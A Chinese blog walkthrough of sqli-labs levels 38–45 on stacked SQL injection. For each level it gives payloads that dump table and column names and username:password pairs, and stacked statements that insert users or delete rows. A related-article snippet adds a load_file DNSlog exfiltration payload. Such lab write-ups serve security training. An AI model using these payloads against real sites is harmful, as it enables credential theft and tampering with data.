sqli-labs通关全解----堆叠注入---38~45---11

最新推荐文章于 2023-12-23 09:44:45 发布
最新推荐文章于 2023-12-23 09:44:45 发布
阅读量458 收藏 3
点赞数
分类专栏: sql-labs 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/128679041
版权

本文引入一个新的概念:堆叠注入

mysli_multi_query()函数:

Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。

使用条件

mysli_multi_query()执行多条查询的函数——防止注入改成mysqli_query()函数

堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用**mysqli_multi_query()**函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。

我们就可以在普通注入的后面,写上一条任意的SQL语句,例如插入数据,或者删库。

sqli-labs中使用了一个章节的大小来描述堆叠注入,但是个人认为该部分在sql注入中并没有扮演如此重要的角色

less 38 GET -Stacked Query Injection-String

 

查询数据表:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查询users列

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

此时,我们就可以在users下插入其他用户,例如

?id=-1' ;insert into users(id,username,password)values(100,'772211','112277');

 less-39 GET-Stacked Query Injection-Intiger based.

该题和上题基本相同,只是闭合方式不同

查询数据表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

查询users列

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

我们就可以在users下插入其他用户

?id=-1 ;insert into users(id,username,password)values(100,'213','123123');

less-40 GET- BLIND based-String-Stacked 

同样是堆叠注入,但是闭合方式修改为'),其他操作基本相同

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

尝试删去id=1的用户

?id=-1') ;delete from users where id=1;

原有id=1

 

 less-41 GET-BLIND based-Intiger-Stacked

该题和之前题目基本相同,依旧是不对报错进行输出,不进行闭合,不多赘述

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

添加用户:

?id=-1;insert into users(id,username,password)values(102,'721','127');

 less-42 POST-Error based-String-Stacked

通过观察源码,本关通过mysqli_real_escape_string对username进行了过滤,有可能进行宽字节注入,但是其不对其查询结果进行回显,但是没有对passwd进行过滤,可以尝试通过passwd进行注入。

按照代码,可以进行联合注入

' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

爆破用户名和密码

' union select 1,group_concat(username,':',password),2 from users #

也可以进行堆叠注入:

';insert into users(id,username,password)values(108,'721','127'); #

less-43 POST -Error based -String -Stacked witth twist 

该题和上题基本相同,只有闭合方式不同,操作基本相同

获取用户名密码:

') union select 1,group_concat(username,':',password),2 from users #

 

堆叠注入

');insert into users(id,username,password)values(99,'722','127'); #

 less-44 POST -Error based-String-Stacked-Blind

 

不能使用报错注入,但是联合注入和堆叠注入不受影响,闭合方式为单引号

' union select 1,group_concat(username,':',password),2 from users #

 

';insert into users(id,username,password)values(106,'721721','127'); #

 

less-45 POST-Error based-String-Stacked-Blind 

与上题基本相同,闭合方式改为')

') union select 1,group_concat(username,':',password),2 from users #

尝试进行堆叠注入

');insert into users(id,username,password)values(100,'721721','127127'); #

 

 

辰霖心
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【合天网安】SQLi-Labs系列之堆叠注入
hehigoxqc606的博客
09-02 351
概念: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆SQL语句(多条)一起执行。而在真实的运用中也是这样的,在mysql中,主要是命令行中,每一条语句结尾加分号;来表示语句结束。 堆叠注入使用条件 堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysql_multi_query()函数,其只能执行一条语句,分号后面的内容将不会被执行。 任务一:基于GET型的堆叠注..
sql-labs 堆叠注入
Khazking的博客
11-29 3060
转载:堆叠注入详解 - 渗透测试中心 - 博客园 (cnblogs.com) 第三十八题 id=1' 说明为' '闭合 id=1'--+ id=1' or updatexml(1,concat(database()),1)--+ id=1' union select 1,database(),2--+ 报错注入无效 联合注入无效说明查询语句不行 这时就可以用堆叠注入,因为堆叠注入可以执行任意类型的语句,并且它显示了字段名username和password 例如id=1';..
sqli-labs(十五)(堆叠注入)
weixin_30407099的博客
09-04 268
第三十八关: 后面好几关都是堆叠注入。简单介绍下: Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条s...
SQL注入07】堆叠注入基础及实操(基于sqli-labs-less38
Fighting_hawk的博客
02-20 4325
1. 了解堆叠注入与union联合查询注入的区别; 2. 了解堆叠注入的限制性因素; 3. 掌握手动堆叠注入的方法。
sqli-labs通关攻略教程——堆叠注入+排序注入(less38~less65)
m0_55854679的博客
08-15 799
文章目录less 38方法1——报错注入联合注入堆叠注入less 39less 40联合注入堆叠注入less 41less 42报错注入堆叠注入less 43less 44less 45less 46报错注入时间盲注less 47less 48less 49less 50堆叠注入报错注入less 51less 52less 53less 54less 55less 56less 57less 58less 59less 60less 61less 62less 63less 64less 65 less 3
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 970
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1548
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
sqli-labs-堆叠注入(stacked injections)
weixin_47346400的博客
02-26 312
堆叠注入的原理传送门
sql_labsqli中的堆叠注入(less-38
最新发布
qq_59020256的博客
12-23 736
id=1' order by 3 -- s 有回显。id=1' order by 4 -- s 报错。id=1' and 1=2 -- s 没有回显。id=1' and 1=1 -- s 有回显。接下来的步骤可以用联合查询进行查询。(1)在users表中添加一个用户。堆叠注入(less-38
Sqli-labs 复习 Less38-45 堆叠注入
kevinhanser
08-12 995
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 堆叠注入 原理简介 堆叠注入简介 Stacked injections: 堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样...
堆叠注入详解
weixin_30271335的博客
09-29 186
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 0x01 堆叠注入原理 在...
sql注入——堆叠注入
cxrpty的博客
02-10 464
堆叠注入即多语句注入,多条语句用;隔开 以sql labs38为例 1.在dnslog上获取 2.在sql labs38上输入多条语句: http://localhost/sqli-labs-master/Less-38/?id=1'; select load_file("\\\\9shl7n.dnslog.cn\\dsfs"); -- - 3.可看到在dnslog上执行成功 ...
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 703
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
SQL注入-堆叠注入
m0_53820621的博客
08-15 1417
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值